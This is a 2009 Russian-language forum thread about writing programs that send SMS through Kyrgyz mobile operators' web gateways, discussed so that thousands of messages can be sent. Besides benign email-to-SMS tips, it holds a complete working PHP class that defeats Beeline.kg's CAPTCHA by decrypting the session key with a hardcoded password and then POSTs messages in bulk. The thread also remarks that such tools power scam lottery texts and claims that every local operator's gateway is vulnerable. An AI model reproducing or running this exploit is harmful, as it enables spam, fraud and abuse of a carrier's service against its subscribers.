Прога для отправки СМС, Хочу написать прогу для отправки пыш-пышек на fonex Опции

два года уже работает:
http://anton-kirsanov.com/fonex/

Купить короткий номер у оператора стоит порядка 100$, плюс абонка 50 в месяц, а смс без лимита в разумных пределах и без спама.

Как вариант ещё можно купить аккаунт в сервисах типа avisosms.ru, тарифы на сайте, но именно на фонекс смски оттуда (да и с других внешних смс провайдеров) не идут.
Ещё вариант - купить смс модем и реализовывать отправку через AT команды.
Ещё вариант - некоторые операторы устанавливают email2sms гейты - например 996550111111@sms.megacom.kg, у фонекса надо уточнять.

Сообщение отредактировал KPbIC - 27.8.2009, 21:02

зачем геморроиться с обходм капчи? пусть она на форме будет появляться, а через поле ввода код капчи будет отправлять на сервер

Romany4
этот способ применим когда одному человеку надо отправить 1-2 смски
а если ему надо отправить 10000 смсок? вот тут и нужен обход капчи.

можно конечно и через АТ команды, и через гейты разные всякие.
но я например рассказал как без всяких договоров и железа за пару часов создается несложный софт для масс рассылок )

можно сделать так как в Coyot, чтоб юзер капчу сам вводил. Там главное куки с сайта брать. Как у фонекса не знаю, а у O.kg вот как:
вот так выглядит картинка
Common/img/secretImage.jpg?sid3=сесия_из_куксов
вот взятые куки
WASession_11291_89739872
в итоге
Common/img/secretImage.jpg?sid3=WASession_11291_89739872

на фонэксе наверное так же ))

а если массово хочешь, ищи распознавалку ))

Сообщение отредактировал scroollocker - 10.9.2009, 22:21

допустим написали такую прогу которая каптчи распознает и отправляет рассылки, мля этой прогой потом хотите какой нибудь лохотрон запустить? типа вы выиграли в лотереи, и закинтье сюда денег получите свой приз? ну типа такого?

atb
зачем )) Можно одновременно всех друзей на днюху пригласить

atb
такой софт уже есть и писать ничего не нужно, его полно ))
а лохатроны именно так и работают, не сидят же их индусы руками рассылают. все автоматизировано.

если кому интересно, вот ссылки про распознавание текста

http://www.citforum.ru/programming/delphi/recognition_1/
http://www.citforum.ru/programming/delphi/recognition_2/

Можно замутить распознавлку Капчи

alligatorus
scroollocker
Толкнули таки меня своими размышлениями на мелкое хулиганство.
http://weltkind.com/ru/work/secrets/?id=166


Билайн и Некси можно обходить без распознавания. А вот например написание распознавалки для Мегакома будет ли дешевле чем покупка номера?

КРЫС

http://anton-kirsanov.com/fonex/

Как фонекс обошел? Что там за прикол с перегенерацией после отправки?

Сообщение отредактировал Weltkind - 27.9.2009, 4:30

Weltkind
мдаааа.... лошары... кто же картинку к идентификатору привязывает......
а у мегакома это дело зарезано, там он текст сам по себе генерится, я когда под него писал, тоже озадачился этим параметром ранд, он там только для отнимания времени у програмистов ))))

E-mail 2 SMS

Услуга E-mail 2 SMS позволяет абонентам FONEX принимать короткие текстовые сообщения от пользователей электронной почты на свой сотовый аппарат в виде SMS. Для того чтобы отправить электронное сообщение абоненту FONEX, отправителю нужно:
Создать новое письмо
В адресе получателя ввести [номер сотового аппарата получателя*]@sms.cdma.kg, например: 950000@sms.cdma.kg
Тему письма оставить пустой (необходимо, чтобы в теме письма не содержалось никаких символов)
В теле письма ввести сообщение
Отправить созданное сообщение.
* номер сотового аппарата получателя может быть представлен в трех форматах – шестизначном (950000), десятизначном (0545950000), двенадцатизначном (996545950000).

На форму кинул листбокс, 2 поля ввода и пару кнопок. По нажатию по кнопке "Отправить" - запускаем отправку письма с заранее указанного ящика, с указанными на форме параметрами.

Так же можно отправлять и на мегаком.
996555ХХХХХХ@sms.megacom.kg
Плюс + мегакома есть отправка icq2sms. Не знаю как на других языках, а для Delphi есть компонент ICQClinet, с помощью которого это можно осуществить

Сообщение отредактировал Romany4 - 3.10.2009, 2:38

Weltkind
мдаааа.... лошары... кто же картинку к идентификатору привязывает......
а у мегакома это дело зарезано, там он текст сам по себе генерится, я когда под него писал, тоже озадачился этим параметром ранд, он там только для отнимания времени у програмистов ))))

мегаком по другому обходится, через внешние шлюзы.

Дело в том что у билайна капчу реализовывали местные парни.
Сессионный ключ просто напросто хранит в себе исходный текст на картинке.
Основная задача - понять как оно работает и расшифровать этот сессионный ключ, получив код на капче, или достать исходники.
http://pastebin.com/f31aa7d25

Вот так и выглядит обход ихней капчи.

Код

<?php


class BeelineWorker extends Worker {

    private $captchaPassword = "captcha";
    private $captchaLen = 5;

    // +996
    protected $mask = array(

        "+996772%",
        "+996773%",
        "+996775%",
        "+996777%",
        "+996778%",
        "+996770%",
    );

    ///  
    function Send()
    {
        $sms = $this->GetSMS();    
        if(!empty($sms))
        {
            foreach($sms as $s)
            {
                $response = "";
                $result = $this->SendSmsViaAnimatedCapthaBug($s->number, $s->message, &$response);
    
                if($result)
                {
                $s->Sended($response);                
                }
                else if($response != null)
                {
                $s->UpdateServiceResponse($response);                
                }

            }
        }
    }


    ///
    function SendSmsViaAnimatedCapthaBug($number, $message, &$result)
    {

        if(preg_match("/^\+?996(\d{3,3})(\d{6,6})$/", $number, $o))
        {
            $code = $o[1];
            $number = $o[2];

            $url = "http://sms.beeline.kg/";

            $c = file_get_contents($url);

            if(preg_match("/capcha\/CaptchaImage\.php\?uid\=\d+\;(.*\%3D)/isU", $c, $o) && preg_match("/<input\s+type\=hidden\s+name\=\"cid\"\s+value\=\"(.*)\">/isU", $c, $oo))
            {
                $secret = urldecode($o[1]);
                $captcha = $this->md5_decrypt($secret, $this->captchaPassword);

                $query = array(

                    "code"        => $code,
                    "phone"        => $number,
                    "uid"         => $captcha,
                    "date"         => date("d.m.Y"),
                    "hour"        => 0,
                    "minute"    => 0,
                    "message"     => $message,
                    "cid"        => $oo[1],
                );
    
                $c = curl_init();

                curl_setopt($c, CURLOPT_URL, $url);
                curl_setopt($c, CURLOPT_REFERER, $url);
                curl_setopt($c, CURLOPT_USERAGENT, "MSIE");
                curl_setopt($c, CURLOPT_POST, 1);
                curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($c, CURLOPT_NOBODY, 0);
                curl_setopt($c, CURLOPT_HEADER, 1);
                curl_setopt($c, CURLOPT_FOLLOWLOCATION, 0);

                curl_setopt($c, CURLOPT_POST, 1);
                curl_setopt($c, CURLOPT_POSTFIELDS, http_build_query($query));

                $r = curl_exec($c);
                $info = curl_getinfo($c);

                curl_close($c);

                if(preg_match("/<div\s+id\=msage>\s*?(.*)\s*?<\/div>/isU", $r, $o))
                {
                    $result = $o[1];                

                    if(preg_match("/Ваше соообщение отправлено/i", $result))
                        return true;
                }
            }
        }

        return false;
    }

    ///
    private function md5_decrypt ( $enc_text, $password, $iv_len = 16 )
    {
        $enc_text = base64_decode ( $enc_text );
        $n = strlen ( $enc_text );
        $i = $iv_len;
        $plain_text = '';
        $iv = substr ( $password ^ substr ( $enc_text, 0, $iv_len ), 0, 512 );

        while ( $i < $n )
        {
            $block = substr ( $enc_text, $i, 16 );
            $plain_text .= $block ^ pack ( 'H*', md5 ( $iv ) );
            $iv = substr ( $block . $iv, 0, 512 ) ^ $password;
            $i += 16;
        }
        return preg_replace ( '/\\x13\\x00*$/', '', $plain_text );
    }
}

код фонекса выкладывать не буду, кому нужно - сами догадаются, уязвимость там не сложная.

на сегодняшний день уязвимы смс шлюзы всех мобильных операторов Кыргызстана.




Сообщение отредактировал KPbIC - 3.10.2009, 16:03

KPbIC
что тут скажешь, юмористы, неужели так тяжело написать нормальную капчу

KPbIC
что тут скажешь, юмористы, неужели так тяжело написать нормальную капчу

Написать нормальную капчу, сложную для разбора роботами, но легкую для человека, действительно сложно.
В данном случае или плохо платят в билайне, или кадровый отбор уже не торт.



Сообщение отредактировал KPbIC - 3.10.2009, 17:01

два года уже работает:
http://anton-kirsanov.com/fonex/

Привет, а можешь сделать веб-морду для отправки сообщений на Билайн?